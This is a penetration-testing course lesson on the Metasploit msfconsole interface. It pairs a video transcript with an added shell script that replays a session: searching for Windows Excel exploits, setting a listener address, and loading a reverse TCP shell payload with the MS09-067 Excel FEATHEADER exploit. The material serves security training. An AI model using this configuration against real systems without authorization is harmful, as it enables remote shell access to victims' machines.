Part 4 - The msfconsole Interface



Time: 5 hours 38 minutes
Difficulty: Intermediate
CEU/CPE: 6
Video Description

Dean goes over using msfconsole and some of the major commands you can run from within it, such as help, search, set, and show. You will use the help command frequently to enumerate the options associated with commands within the Metasploit Framework. The search and show commands can be used in tandem to discover and explore the various exploits and payloads Metasploit provides. This comes in very handy when looking for an exploitable vulnerability in a specific application on a specific OS, such as Excel on a Windows target.
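The workflow the description summarises (check the database, ask help about a command, search for a module, use it, show its options, targets and payloads, set or setg values, then unsetg them) written out as a Metasploit resource script and wrapped in a POSIX shell script that replays it with `msfconsole -q -r`. This is an added example, not code from the course or from the Metasploit project. The listener address 192.168.56.101, the resource-script path, and the module path `exploit/windows/fileformat/ms09_067_excel_featheader` (the Excel FEATHEADER module the video appears to pick) are assumptions; confirm the path with `search excel` on your own install before relying on it.

```shell
#!/bin/sh
# Added example (not from the course): build a Metasploit resource script that
# replays the msfconsole session described in this lesson, then run it with
# `msfconsole -q -r` if Metasploit is installed on this box.

# Emit the resource script. Every line is a command exactly as you would type
# it at the msf prompt; msfconsole executes them top to bottom and '#' lines
# are treated as comments.
make_rc() {
cat <<'EOF'
# confirm the database connection before doing anything else
db_status
# help <command> prints usage and flags for that command
help search
# narrow the search by module type and platform, then by keyword
search type:exploit platform:windows excel
# setg makes LHOST persist across modules; plain set is dropped on `back`
setg LHOST 192.168.56.101
# payload paths tab-complete at the prompt; in a script spell them out
use payload/windows/shell/reverse_tcp
show options
back
# assumed module path for the Excel FEATHEADER exploit; verify with `search excel`
use exploit/windows/fileformat/ms09_067_excel_featheader
show targets
show payloads
set PAYLOAD windows/shell/reverse_tcp
set LPORT 4444
show options
show advanced
show evasion
# remove the global value again so it does not leak into the next engagement
unsetg LHOST
exit
EOF
}

# Where to write the resource script (assumed default path).
rc_file="${1:-${TMPDIR:-/tmp}/msf_walkthrough.rc}"
make_rc > "$rc_file"

# Replay the session only when msfconsole is present; otherwise the .rc file
# is left on disk for inspection or for a later `msfconsole -r "$rc_file"`.
if command -v msfconsole >/dev/null 2>&1; then
  msfconsole -q -r "$rc_file"
fi
```

On a box without Metasploit the script only writes the resource file, which is still useful to read through: the order of commands mirrors the lesson, and the closing unsetg shows why a value set with setg has to be removed explicitly rather than simply backing out of the module.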

Video Transcription
We'll look into some of the database options here a little bit later. One thing we can do, since we know that the database is already set up, is run the "db_status" command. That lets me double-check. I can see that I'm connected to msf3, which is the name of the instance, but what I'm really interested in showing is some of the other commands that Metasploit gives you within the framework to do your work. We'll get a chance to explore most of these, not everything of course, but on any particular command, for instance, let's say I want to look at the help for a particular command like "load", I just type "help" and the name of the command and it tells me a little bit about it. It gives me some extra information. I can try this for another command, like "loot". We'll get a chance to look at what loot does a little bit later as well, but you get the basic idea. You have some usage information, some command-line options, while you're inside the framework itself.

Some of the other commands to think about once we are using the tool: I will demonstrate some of the commands as we go, but a quick scan of the help directory gives you an idea of some of the possibilities. We can do things like load a payload, we can use an exploit, we can connect to a command shell, we can send a process to the background if we wanted to. There's lots of different possibilities here.

We're going to poke around the interface a little bit more. I'm going to just simulate the beginnings of doing some other exploit work, just to show how some of the features in the interface work. For instance, I could decide I want to do a search for a particular type of exploit, so I can run the search command. The one I want is going to contain the text "reverse_tcp". That should turn up a lot of actual choices. One of the ones I might be interested in among all the available options here is this one, reverse TCP shell to a Windows machine. We can see that its ranking is normal. It's a Windows command shell, reverse TCP stager; we'll talk about what that means a little bit later, but these rankings help me decide if the payload that I want to use has an excellent chance or a good chance or a great chance of being successful. Most of these are showing up as normal. Sure, if I were to scroll, I've got some here that are average, some that are good, but the one that I want to use as an example, I'll just go ahead and use this normal one. I'm going to right-click, copy that, and I can paste it right in. Go ahead and use that. Now you'll notice that the prompt changes to red; that shows me that I'm in the payload reverse TCP for Windows. I'm going to use the "back" command to back out of what I just did.

To show you a different way to do this, maybe I have some idea of what the payload or the exploit is, so I can just start typing and use tab completion. So "pay", Tab, I get "payload"; start typing "windows", hit Tab, I get "windows". I know it might be the "shell" directory and it's probably "reverse". Now it looks like I had more than one option here, so I'll just start typing "t", I hit Tab, and I get "reverse_tcp". Now I've got the payload ready to configure.

One of the powerful commands is the "show" command. Show lets you look at lots of different things. If I run show without any arguments, I'll get every single payload, every single exploit, pretty much all of the framework functionality. I can also narrow that down by running show to just show me exploits, or show me payloads, or show me nops, or show me info. I can also run "show options" if I want to see the options for this particular exploit. What it's looking for is an exit function. Some of the options are predefined, some options are not. For instance, LHOST stands for local host, LPORT for local port. A lot of options that you'll see will have RHOST for remote host or RPORT for remote port, but in this case I've just got LHOST to deal with. The way that I can put a value in, or put a setting into this option, is to use the set command. I can say "set LHOST". I want to make it my local machine, so I'll type in that IP address. Now if I run "set options" again... I'm having a hard time spelling today. Not "set options", "show options". I can see that LHOST is now set.

Another useful feature, when we see this right here, is using the -g option. What I'll do is I'll back out of that particular payload now; that one's no longer being used, and those options that I've set have been removed. I can go ahead and use my up arrow to go back to that command I ran earlier, and I'll go back into the same payload. Notice the prompt changes again, but now what I can do is use a "setg" command for my LHOST. setg is the setting for that particular variable to be a global setting. For instance, if you're doing a bunch of work and you've got a target that's a particular remote host, or a particular local host like your Kali instance itself, it makes more sense to use "setg" or "set -g". That way you don't have to set this every single time. You'll notice, because I set this parameter, if I do "show options", it's there. If I were to back out of this and go into a different payload, I would find that that local host variable has also been set globally.

I can also unset. Just like setg, I can use "unsetg" for LHOST. Now that parameter is unset; that variable's no longer there. Well, it's unset from a global set, or from a global stage. I would have to unset it specifically within this plugin for that to go away. Now you'll notice that it's missing. Two options: it's a local setting for the variable, and if you back out of your payload, those settings are gone; or the global setting, which lets you have those values persist while you're doing your different activities.

We have a search command also. Let me back out of this. Search lets me do things like look for reverse TCP, for instance. I'm going to get a lot of hits on this search because a lot of reverse TCP options are available, but I can also do things like search for a particular platform. Let's say I only want to look for OSX exploits. You'll notice that the OSX shows up. Some of these are multiple platforms, so you'll see the word "multi" there. As you start to play around with the interface, this will become a little bit more natural and intuitive, to see what it is that you're actually looking at, but it's a nice feature. I can search for Windows exploits, for instance. These are nice features, and we can also do a help on the search command to see what the different options are. For instance, I can search for, let's say, a particular author. I don't know any authors off the top of my head, so maybe that's not the best one to try, but we can try searching for a name, which I've already shown, but also the type. I can say, search for a post exploit that has the word TCP in it. That's going to give me a lot of hits, but you get the basic idea of how powerful the interface can be.

I can also use the show command. If I run this without any arguments, I'll get all of the items that Metasploit has available, but I can also, let's say, rather than search for all of them, show all of my payloads. I can see all of those. This gives you a little bit more of an idea of what kind of functionality is really built into the framework. It's quite extensive, it's quite complex. It seems a little bit overwhelming at first, and that's normal. As you get more familiar, as we start to go through more of these functions, it'll be a little bit more clear.

Okay, let's look a little further into interacting with some of the payloads and other things, to see just some of the mechanics of getting yourself situated. We'll go into more detail, of course, a little bit later as to how to select your target and what vulnerabilities to look for. Let's say, on my endpoint system, maybe there's a suspicion that there might be an Excel vulnerability I can exploit. Maybe I know that it's a Windows system and I can take advantage of that. One of the things I can do is a search for Excel. I've got one here that looks to be good rank: Microsoft Excel Malformed FEATHEADER Record Vulnerability. This one looks good. I'm going to go ahead and use this. I'll type "use". Remember, I can just start typing and tab-complete "exploit", then tab-complete "windows", "fileformat", [inaudible] nine, and eventually I'll get there, or just copy and paste, whichever you think is faster for your own use. I'll go ahead and, now, I'm in this FEATHEADER exploit.

I can show my options, as we've seen before, just to see what's available to me. I could also do some other interesting things. I can show my targets. What are the applicable targets for this particular exploit? I can see I've got Microsoft Office 2002, 2003, 2007. There's some interesting options there. I can also show the payloads that this particular exploit might use. A lot of different choices for this particular payload that I can attach to my exploit to take advantage of this vulnerability. I might be able to also find some advanced options for this particular exploit. There's my exploit again, and I've got other things here like the payload handler, the different encoding methods, and so on. There's lots of options. "show evasion": that's not going to show me anything for this particular one, but it gives you some clues for IDS evasion that we'll explore a little bit later.